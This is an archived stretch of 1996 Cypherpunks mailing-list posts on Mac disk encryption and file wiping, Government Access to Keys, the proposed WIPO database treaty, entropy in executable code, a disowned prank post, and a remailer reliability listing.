> = ph@netcom.com (Peter Hendrickson) wrote:
>> = tom bryce wrote:

>> (2) Partition the hard drive into two partitions:
>>    install the system folder on one and a copy of CryptDisk
>>    make this the startup partition and make it READ ONLY with aliases to
>>    folders you want to be modiyfable (such as Eudora Folder in the sys
>>folder)
>>    place these folders on the encrypted partition
>
>I don't think you will be able to do this.  I have heard that too many
>things modify files in the system folder for this to work.  It wouldn't
>surprise me if the OS modifies its own boot file from time to time.
>
>I'm not expert.  If you get this working I would appreciate it if you
>were to post it to the list or let me know directly.

-and-

>Watch out for the clipboard which appears to be stored as a file in
>the system folder.  Unfortunately, it has to be a real file - aliases
>not allowed.  This makes it harder to have a read only system folder
>and, of course, every time you cut and paste something you leave a
>ghost on the disk for an undefined length of time.  It's hard to
>work on the Mac without using the clipboard.

The fact that you can start up and run your system from a CD rom proves
that you can lock your startup disk. Grab a DISK TOOLS disk from your most
recent system installer disks (mine is 7.5) and flip the write protect tab,
then start up from it. Clipboard works, too. I haven't worked with such a
system extensively enough to see if there are any glitches (such as copying
large amounts of stuff to the clipboard, etc.) but it should get the job
done for the truly paranoid.

I have a few items in the system folder presently aliased out onto other
disks - my Eudora Folder is on an encrypted partition, and there's no
reason one couldn't do this with the whole preferences folder and other
stuff.

>> If locking the startup volume turns out to be too much of a pain, one could
>> install trashguard from Highware software and set it to triple overwrite
>> deleted files, and otherwise not lock the startup partition.
>
>I'm guessing you already know this, but once you've written something
>to the disk you might as well assume it's there forever.  Triple overwrite
>of files will defeat Norton Utilities, but may not stop a determined
>opponent.

Right. I'm proposing this as a compromise if you wish to trade security for
convenience.

>Commercial data recovery services claim to be able to recover data
>after nine formats of the disk.  It is difficult to say for certain
>what the technical limits of this technology are.  For instance, maybe

Colin Plumb gave me estimates of what you needed to wipe a disk clean once,
which he researched for SFS. It depends on whether the erasure pattern is
custom designed for the data to wipe. It was something vaguely like (don't
quote me) 15 passes if custom designed, and 25 if not. This refers, as I
recall, to data freshly written to the disk. Data that hangs out for a
while 'leaks' deeper into the disk, with adjacent molecules becoming
aligned further between tracks and deeper into the disk and is harder to
erase. A dejanews search under colin's name should yield his extensive
posts on this topic.

Tom







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M. Lacey" <mml@halcyon.com>
Date: Mon, 11 Nov 1996 00:46:03 -0800 (PST)
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: GAK?
Message-ID: <01BBCF69.4C261320@blv-pm105-ip27.halcyon.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Could someone please fill me in on what GAK stands for
since it seems to be central to some of the on going
conversations.

Thanks,

Mark M. Lacey <mml@halcyon.com>
"Speaking for nobody but myself."
[Finger mml@halcyon.com for my PGP public key.]
[If you don't have 'finger', e-mail me for it.]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMobmyB/Hx+OuZC/tAQGRTAf/R2t+/JC1k3lhQcqIcRWO2HyxHgf6+ko2
2ngQBXyMrInQtaXorcZ2LFrfie4GD68S0nLWKlwqaN09+/O72Bze1pyGd3dHBI4b
vazgQZq1zxWuHcCYg1r5QDwt0NJOZg4tRHROHmUiuLLeNfFwusWPnW+RMI2nTo39
g/sXWhRUF83vhyztC5+zOKmxjEQOBf3Wxq0FLBAoSUjzuJKnRNV87Fnf2vzezqc4
cK+A8DcRN0c0kX/LuNO9pnXo+3J8gMMDsoZAOS5KAgWQjJT3fdroTLX4xmRcBVJ3
NanTSXWsFIMlnXAjBS7V+5S/3gAml+y5tqLiNJAhoVVD/nvyvQDmAg==
=QyM4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sun, 10 Nov 1996 18:13:24 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: WIPO Treaty:  Worse than CDA- Deadline 22 Nov 96       ; availability and use of knowledge emasculated        ; impact on web catastrophic.
Message-ID: <199611110214.TAA18631@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


                WIPO Treaty:  Worse than CDA

                Deadline 22 Nov 96 for comment to Congress

        WIPO was introduced this spring to Congress.  It is not 
    understood by either the Clinton administration or the Congress and
    few of the public are aware of the problem!

        CP internal bad mouthing and intellectual assignations need to
    to come to a dead halt --if we want the net at all, or for the net
    to be an information provider, the impact of the CDA would be 
    chump change for peanuts in comparison.

        The WIPO clauses involving rights to collections of what are 
    commonly public domain "fact" will become private property 
    --literally; even more so than the restrictions of the 'fair use' 
    conventions. The availability of knowledge emasculated; the impact 
    on web is catastrophic;  web information and fair use policies 
    are gutted.


        My message to Bubba, West Publishing, and the rest of the 
    greedy bastards:


            Cyberspace and Freedom are Information.  
            FUCK your WIPO, too. 
                                                                -attila
 
       -------------------------------------------------------------------------------------------------------
            The following message is an excerpt of a message from James 
        Love <love@tap.org> forwarded by attila <attila@primenet.com>
        see  Consumer Project on Technology:  http://www.essential.org/cpt           
        -------------------------------------------------------------------------

-.	Sports fans in the United States will be surprised to learn 
-.that U.S. Government officials are pressing for the adoption of 
-.an International treaty that will (if enacted) significantly 
-.change the ways sports statistics are controlled and 
-.disseminated.  The treaty isn't specifically directed at sports 
-.statistics -- 

        it is a much broader attempt to create a new 
    property right in facts and other data now in the public 
    domain -- but it will have an enormous impact on the legal 
    rights  [...] on sports, stock prices, weather data, train 
    schedules, data from AIDS research and other facts are
    controlled....  See, for example:
 
                http://www.news.com/News/Item/0,4,3208,00.html

        The treaty addresses much more fundamental issues regarding 
    ownership of information currently in the public domain... 

        I am deleting the bulk of the report for brevity, including only
    the definition of the "database" as it applies to WIPO.

-.WHAT IS A DATABASE? WHAT ISN'T A DATABASE?
-.
-.The treaty would protect "any database that represents a 
-.substantial investment in the collection, assembly, verification, 
-.organization or presentation of the contents of the database." 
-.
-.This term should be understood "to include collections of 
-.literary, musical or audiovisual works or any other kind of 
-.works, or collections of other materials such as texts, sounds, 
-.images, numbers, facts, or data representing any other matter or 
-.substance" and "may contain collections of expressions of 
-.folklore." The "protection shall be granted to databases 
-.irrespective of the form or medium in which they are embodied. 
-.
-.Protection extends to databases in both electronic and non-
-.electronic form" and "embraces all forms or media now known or 
-.later developed. . . Protection shall be granted to databases 
-.regardless of whether they are made available to the public. This 
-.means that databases that are made generally available to the
-.public, commercially or otherwise, as well as databases that 
-.remain within the exclusive possession and control of their 
-.developers enjoy protection on the same footing."
-.
-.WHAT ARE EXTRACTION AND UTILIZATION RIGHTS?
-.
-."The maker of a database eligible for protection under this 
-.Treaty shall have the right to authorize or prohibit the 
-.extraction or utilization of its contents." What is "extraction"? 
-.Extraction is defined as, "the permanent or temporary transfer of 
-.all or a substantial part of the contents of a database to 
-.another medium by any means or in any form." "Extraction . . . is 
-.a synonym for `copying' or `reproduction' . . . by `any means' or 
-.`any form' that is now known or later developed."
-.
-."Utilization" is defined as "making available to the public all 
-.or a substantial part of the contents of a database by any means, 
-.including by the distribution of copies, by renting, or by on-
-.line or other forms of transmission," including the right to 
-.control the use of the data "at a time individually chosen by 
-.each member of the public."
-.
-.WHAT IS A "SUBSTANTIAL PART" OF THE DATABASE?
-.
-.The treaty sets out tests for determining if an extraction is 
-."substantial," and these tests are both highly anticompetitive, 
-.and extremely broad in scope.
-.
-.The "substantiality" of a portion of the database is assessed 
-.against the "value of the database," and considers "qualitative 
-.and quantitative aspects," noting that "neither aspect is more 
-.important than the other . . . This assessment may also take into 
-.account the diminution in market value that may result from the 
-.use of the portion, including the added risk that the investment 
-.in the database will not be recoverable. It may even include an 
-.assessment of whether a new product using the portion could serve 
-.as a commercial substitute for the original, diminishing the 
-.market for the original."
-.
-.Then the treaty adds that a "substantial part" means any portion 
-.of the database, "including an accumulation of small portions . . 
-.. In practice, repeated or systematic use of small portions of 
-.the contents of a database may have the same effect as extraction 
-.or utilization of a large, or substantial, part of the contents 
-.of the database."
-.In the US implementing legislation, the only types of data use 
-.that would not be regulated would be "insubstantial" parts, 
-."whose extraction, use or reuse does not diminish the value of 
-.the database, conflict with a normal exploitation of the database 
-.or adversely affect the actual or potential market for the 
-.database." Under this language, a database owner could say that 
-.it might in the future want to charge for each transmission of a 
-.fact or an element of a database as part of its "normal 
-.exploitation" of the database. With the Internet and digital cash 
-.this claim is likely to be made. The public would not have "fair 
-.use" rights, since fair use is only defined in matters involving 
-.copyright.
-.
-.FOR HOW LONG? 15 YEARS, 25 YEARS, OR FOREVER?
-.
-.The Treaty would require a minimum term of protection (15 years 
-.in the EU proposal, and 25 in the United States proposal) for the 
-.database. But this is extended each time the database is revised 
-.or enhanced. According to the draft treaty, "any substantial 
-.change to the database, evaluated qualitatively or 
-.quantitatively, including any substantial change resulting from 
-.the accumulation of successive additions, deletions, 
-.verifications, modifications in organization or presentation, or 
-.other alterations, which constitute a new substantial investment, 
-.shall qualify the database resulting from such investment for its 
-.own term of protection."
-.
-.The provision on revisions raises the specter that protection for 
-.many databases will be perpetual. This could indeed be the case 
-.if the original versions of the database  are only "licensed" by 
-.the vendor for a limited period of time, so that the only 
-.available versions would be the new ones, which would have a new 
-.term of protection. [Database vendors write these restricted use 
-.licenses now].
-.
-.    The proposals for a new legal environment for publishing 
-.facts are outlined in a draft treaty on "databases" that will be 
-.considered at a December 1996 meeting of the World Intellectual 
-.Property Organization (WIPO), in Geneva, Switzerland.  See:
-.
-.    www.public-domain.org/database/database.html
-.  
-.    The proposal would require the United States and other countries to
-.create a new property right for public domain materials. "Texts, sounds, 
-.images, numbers, facts, or data representing any other matter or 
-.substance," will be protected. 
-. 
-.    The treaty seeks, for the first time, to permit firms to 
-."own" facts they gather, and to restrict and control the 
-.redissemination of those facts.  The new property right would lie 
-.outside (and on top) of the copyright laws, and create an 
-.entirely new and untested form of regulation that would radically 
-.change the public's current rights to use and disseminate facts 
-.and statistics.  American University Law Professor Peter Jaszi 
-.recently said the treaty represents "the end of the public 
-.domain." 
-. 
-.Copies of the proposed treaty, a federal register notice 
-.asking for public comment, and independent commentary can be 
-.found at:
-.
-.          http://www.public-domain.org/database/database.html
-.
-.WHO IS PUSHING FOR THE DATABASE TREATY?
-.
-.	In 1991, the US Supreme Court ruled (in the Feist decision) 
-.that the facts from a telephone "White Pages" directory of names, 
-.addresses and phone numbers were not protected under the 
-.copyright laws, and that in general, "facts" could not be 
-.copyrighted by anyone.  The Feist decision alarmed several large 
-.database vendors, who crafted this new "sui generis" property 
-.right that would protect facts, and just about everything else.
 
-.[The vendors have already succeeded in obtaining a directive on 
-.the database proposal from the European Union, although no European 
-.country has yet passed legislation to implement the treaty]. The 
-.most active supporter of this new property right is West 
-.Publishing, the Canadian legal publisher. A West Publishing 
-.employee chairs a key ABA subcommittee which wrote a favorable 
-.report on the treaty.  A number of very large British and Dutch 
-.database vendors are also lobbying hard for the treaty.
-.West wants the new property right to protect the "page 
-.numbers" and "corrections" it adds to the judicial opinions it 
-.publishes in paper bound books.  Telephone companies want to 
-.protect the names, addresses and telephone numbers they publish, 
-.and other database vendors what to protect scientific data or 
-.other non-copyrighted government information they publish.  In 
-.seeking to protect these items, the treaty was written to stamp 
-."owned by" labels on a vast sea of information now in the public 
-.domain.  Copyright experts J.H. Reichman and Pamela Samuelson  
-.say  it is the "least balanced and most potentially anti-
-.competitive intellectual property rights ever created."   see:
-.
-.            http://ksgwww.harvard.edu/iip/reisamda.html
-.
-.	In Feist, the Supreme Court noted:
-.     (a) Article I, Sec. 8, cl. 8, of the Constitution mandates 
-.     originality as a prerequisite or copyright protection. The 
-.     constitutional requirement necessitates independent creation 
-.     plus a modicum of creativity. Since facts do not owe their 
-.     origin to an act of authorship, they are not original and, 
-.     thus, are not copyrightable.  
-.     [From the Syllabus of the opinion, at:
-. 
-.            http://www.law.cornell.edu/supct/classics/499_340v.htm
-.
-.Since facts cannot be copyrighted, the supporters of the 
-.treaty have framed this as a new "sui generis" property right, 
-.which will have a separate statutory framework.  "Originality" or 
-."authorship" will not be required.
-. 
-.As a "sui generis" property right, the database proposal 
-.does not incorporate the fair use principles from copyright that 
-.reporters and value added publishers often take for granted.  The 
-.leagues would be able to require license to publish box scores or 
-.other statistics in any media.  One can imagine a world where the 
-.leagues wouldn't require licensing of box scores to print based 
-.periodicals like daily newspapers, but that a much more 
-.controlled regimen would evolve on the Internet.  The leagues 
-.could require licensing of box scores and other statistics for 
-.Internet publications, or linking to the leagues own web sites, 
-.such as:
-.
-.            www.nba.com 
-.            www.nba.com
-.            www.nhl.com
-.  
-.WHAT CAN YOU DO?
-.
-.    The government is taking comments on the database treaty 
-.through November 22, 1996.  If you don't think the government 
-.should rush into a new regulatory scheme for sports statistics, 
-.let them know.  
-.    You can email your comments to:
-.
-.            diploconf@uspto.gov
-.
-.If you want to know more about his proposal, check out:
-. 
-.            http://www.public-domain.org/database/database.html
-.
-.Two law professors who have studied the treaty extensively are:
-. 
-.Professor Pamela Samuelson, University of California at Berkeley, 
-.Voice (510)642-6775, pam@sims.berkeley.edu
-.
-.Professor Peter Jaszi, American University, School of Law, Voice 
-.(202) 885-2600, pjaszi@wcl.american.edu
-.
-.                             APPENDIX
-.
-.Extracts from James Love, "A Primer On The Proposed WIPO Treaty 
-.On Database Extraction Rights That Will Be Considered In December 
-.1996, October 29, 1996,
-. 
-.            http://www.essential.org/cpt/ip/cpt-dbcom.html

--
            Cyberspace and Freedom are Information.  
            FUCK your WIPO, too. 
                                                                -attila
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Mon, 11 Nov 1996 01:03:35 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Sifting data; looking for "strong crypto"
Message-ID: <199611110903.BAA07962@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain



As far as bit patterns go, is executable code random?

mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Renner <dougr@skypoint-gw.globelle.com>
Date: Sun, 10 Nov 1996 23:12:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Federal Reserve Bank is ILLEGAL?
Message-ID: <Pine.3.89.9611110517.A13588-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



http://feustel.mixi.net/GOV/DEPTS/fedres.html

Most list members would be very interested in the above link.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 11 Nov 1996 05:06:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: two bogus messages to this list
Message-ID: <199611111238.GAA17346@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


I did not write the two messages below. I did have a small party
yesterday, probably some of my guests did that...

	- Igor.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
>From cypherpunks-errors@toad.com  Mon Nov 11 06:35:19 1996
Return-Path: <cypherpunks-errors@toad.com>
Received: (from root@localhost) by manifold.algebra.com (8.8.2/8.8.2) with UUCP id GAA16814 for ichudov@algebra.com; Mon, 11 Nov 1996 06:34:44 -0600
Received: from toad.com (toad.com [140.174.2.1]) by www.video-collage.com (8.8.0/8.8.0) with ESMTP id CAA20037 for <ichudov@algebra.com>; Mon, 11 Nov 1996 02:34:30 -0500 (EST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id VAA01399 for cypherpunks-outgoing; Sun, 10 Nov 1996 21:49:52 -0800 (PST)
Received: from www.video-collage.com (www.video-collage.com [199.232.240.107]) by toad.com (8.7.5/8.7.3) with ESMTP id VAA01394 for <cypherpunks@toad.com>; Sun, 10 Nov 1996 21:49:47 -0800 (PST)
Received: (from uucp@localhost) by www.video-collage.com (8.8.0/8.8.0) with UUCP id AAA19874 for cypherpunks@toad.com; Mon, 11 Nov 1996 00:51:53 -0500 (EST)
Received: (from ichudov@localhost) by manifold.algebra.com (8.8.2/8.8.2) id XAA15989 for cypherpunks@toad.com; Sun, 10 Nov 1996 23:47:00 -0600
Date: Sun, 10 Nov 1996 23:47:00 -0600
From: "Igor Chudov @ home" <ichudov@algebra.com>
Message-Id: <199611110547.XAA15989@manifold.algebra.com>
Subject: FUCK ME HARD
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Status: O

FUCK NME HARD


>From cypherpunks-errors@toad.com  Mon Nov 11 00:35:29 1996
Return-Path: <cypherpunks-errors@toad.com>
Received: (from root@localhost) by manifold.algebra.com (8.8.2/8.8.2) with UUCP id AAA16188 for ichudov@algebra.com; Mon, 11 Nov 1996 00:35:24 -0600
Received: from toad.com (toad.com [140.174.2.1]) by www.video-collage.com (8.8.0/8.8.0) with ESMTP id BAA19940 for <ichudov@algebra.com>; Mon, 11 Nov 1996 01:37:38 -0500 (EST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id VAA00961 for cypherpunks-outgoing; Sun, 10 Nov 1996 21:03:06 -0800 (PST)
Received: from www.video-collage.com (www.video-collage.com [199.232.240.107]) by toad.com (8.7.5/8.7.3) with ESMTP id VAA00956 for <cypherpunks@toad.com>; Sun, 10 Nov 1996 21:03:03 -0800 (PST)
Received: (from uucp@localhost) by www.video-collage.com (8.8.0/8.8.0) with UUCP id AAA19793 for cypherpunks@toad.com; Mon, 11 Nov 1996 00:05:09 -0500 (EST)
Received: (from ichudov@localhost) by manifold.algebra.com (8.8.2/8.8.2) id WAA15563 for cypherpunks@toad.com; Sun, 10 Nov 1996 22:36:03 -0600
Date: Sun, 10 Nov 1996 22:36:03 -0600
From: "Igor Chudov @ home" <ichudov@algebra.com>
Message-Id: <199611110436.WAA15563@manifold.algebra.com>
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Status: RO

manifold::~==>premail -t cypherpunks@toad.com
Chain: haystack;jam
Subject: I urgently need a lot of money.

Please share your money-making secrets, I am in a desperate need
for cash.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 11 Nov 1996 07:09:56 -0800 (PST)
To: Murray Hayes <mhayes@infomatch.com>
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <32873C02.73A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Murray Hayes wrote:
> As far as bit patterns go, is executable code random?

Bit patterns will vary *widely* in executable code.  Some executable
code will contain patterns that will probably be instantly recognizable
to persons who know what to look for.

If you have the right statistics software and know how to use it, you
could evaluate some of those executables, but what it would tell you
would depend on your interpretive ability.

I have a question (or suggestion):

If you have access to a full-screen browser, which can fill the entire
screen with text (i.e., you can eliminate any status lines, etc.), why
not do some bit dumps into an ASCII file that contains just "1"'s and
"0"'s, and then view the file by holding down the down-arrow or page-
down key (assuming a fast enough cursor speed)?

The file would look something like this:  10101110000010101101000101101
but would fill the entire screen, and by scrolling through it, it seems
you would notice any obvious bit patterns.

Just a thought....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 11 Nov 1996 06:53:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199611111450.GAA23797@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 11 Nov 96 6:49:56 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          ******** ***    14:49  99.77%
extropia remail@miron.vip.best.com        -.--__..---  17:21:56  99.28%
balls    remailer@huge.cajones.com        * **+**- ***     7:35  99.23%
cyber    alias@alias.cyberpass.net        +   +*-- +**    39:50  99.18%
replay   remailer@replay.com              +++* --- ***    22:22  98.78%
dustbin  dustman@athensnet.com            - --   -  -+  1:18:14  98.56%
haystack haystack@holy.cow.net            ++#. + - ***    47:04  98.24%
squirrel mix@squirrel.owl.de              +----+-- +++  2:15:31  97.94%
middle   middleman@jpunix.com               +----- -    2:51:34  94.38%
lead     mix@zifi.genetics.utah.edu       - +++--  +++    42:54  93.75%
lucifer  lucifer@dhp.com                  ++ +++-- + +    56:13  89.49%
mix      mixmaster@remail.obscura.com        +++-- -+   1:10:46  84.64%
exon     remailer@remailer.nl.com         ++# + -         10:34  43.55%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 11 Nov 1996 04:01:55 -0800 (PST)
To: mml@halcyon.com (Mark M. Lacey)
Subject: Re: GAK?
In-Reply-To: <01BBCF69.4C261320@blv-pm105-ip27.halcyon.com>
Message-ID: <m0vMv1C-0000wpC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. Lacey enscribed thusly:

> -----BEGIN PGP SIGNED MESSAGE-----

> Could someone please fill me in on what GAK stands for
> since it seems to be central to some of the on going
> conversations.

	G)overnment
	A)ccess
	  to
	K)eys

	Generally pronounced as you would imagine Bill the Cat expressing it...

	AKA: Key Escrow...

> Thanks,
> 
> Mark M. Lacey <mml@halcyon.com>
> "Speaking for nobody but myself."
> [Finger mml@halcyon.com for my PGP public key.]
> [If you don't have 'finger', e-mail me for it.]


> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMobmyB/Hx+OuZC/tAQGRTAf/R2t+/JC1k3lhQcqIcRWO2HyxHgf6+ko2
> 2ngQBXyMrInQtaXorcZ2LFrfie4GD68S0nLWKlwqaN09+/O72Bze1pyGd3dHBI4b
> vazgQZq1zxWuHcCYg1r5QDwt0NJOZg4tRHROHmUiuLLeNfFwusWPnW+RMI2nTo39
> g/sXWhRUF83vhyztC5+zOKmxjEQOBf3Wxq0FLBAoSUjzuJKnRNV87Fnf2vzezqc4
> cK+A8DcRN0c0kX/LuNO9pnXo+3J8gMMDsoZAOS5KAgWQjJT3fdroTLX4xmRcBVJ3
> NanTSXWsFIMlnXAjBS7V+5S/3gAml+y5tqLiNJAhoVVD/nvyvQDmAg==
> =QyM4
> -----END PGP SIGNATURE-----

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sun, 10 Nov 1996 23:20:25 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: WIPO Treaty:  Worse than CDA- Deadline 22 Nov 96
In-Reply-To: <199611110655.WAA23446@mail.pacifier.com>
Message-ID: <199611110721.AAA26153@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611110655.WAA23446@mail.pacifier.com>, on 11/10/96 
   at 10:50 PM, jim bell <jimbell@pacifier.com> said:

-.Somebody must have said, once, that the winner in an argument is the one who 
-.gets to define the terms.  Notice how the term "protect" and "protection" 
-.are misused above. (not by Attila, of course; but by whomever he's quoting.)  

-.However, the term "protect" has long been misused by lawyers in just such a 
-.way.  "Monopolize" would be a more appropriate word under the circumstances.

        monopolized is actually too 'weak' a final description of the 
    results --how about 'absolute denial of information?'

        what itrigues me the most is the bill originated at the White 
    House!   I won't waste time preaching to the choir, but the
    original intent was to protect West Publishing's "keyed" and
    proofed legal reference material (in return for a a hefty campaign
    contribution, and who nows what else under the table...).  just
    because it is legal, does not make it moral.

        some lame-brain (probably DOJ and whitehouse political hacks)
    expressed the terms in the treaty bill so broadly that it is all inclusive --everything.

        this is a case of no speech at all....     goodbye information 
    age, hello darkness.

        of course, there is always the possibility that Bubba _desires_
    to crash the economy so he can declare martial law for his NWO
    mentor, George Bush.

                --attila

--
            Cyberspace and Freedom are Information.  
                FUCK your WIPO, too. 
                                                                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Mon, 11 Nov 1996 04:17:03 -0800 (PST)
To: mhayes@infomatch.com
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <199611111218.HAA09575@gate.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


An entity claiming to be Murray Hayes wrote:
: 
: 
: As far as bit patterns go, is executable code random?
: 
: mhayes@infomatch.com
: 
: It's better for us if you don't understand
: It's better for me if you don't understand
:                                              -Tragically Hip
: 

Nope, any executable has the same text-data-stack structure.  Within the
text segment, all instructions are (usually) of the same size with 
one to four possible formats.  Consider that every instruction will
begin with one of ~128 opcodes, operands are pretty predictable depending
on the opcode's associated format.  Any references to symbol and literal
tables are within a predictable range, and the format of these tables
is fixed.

An assembled/linked program is going to be very far from random, same
basic patterns are used for I/O, subroutine calls, iterative loops, etc.
I would assume that the entropy of an executable binary is extremely low.

mark


-- 
[]  Mark Rogaski                    
[]  wendigo@pobox.com               
[]  http://www.pobox.com/~wendigo/  
[]  >> finger for PGP pubkey <<     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: #6 <thevillage@island.gov>
Date: Mon, 11 Nov 1996 07:45:49 -0800 (PST)
To: Murray Hayes <mhayes@infomatch.com>
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <3286DA76.6C2E@island.gov>
MIME-Version: 1.0
Content-Type: text/plain


Murray Hayes wrote:
> 
> As far as bit patterns go, is executable code random?
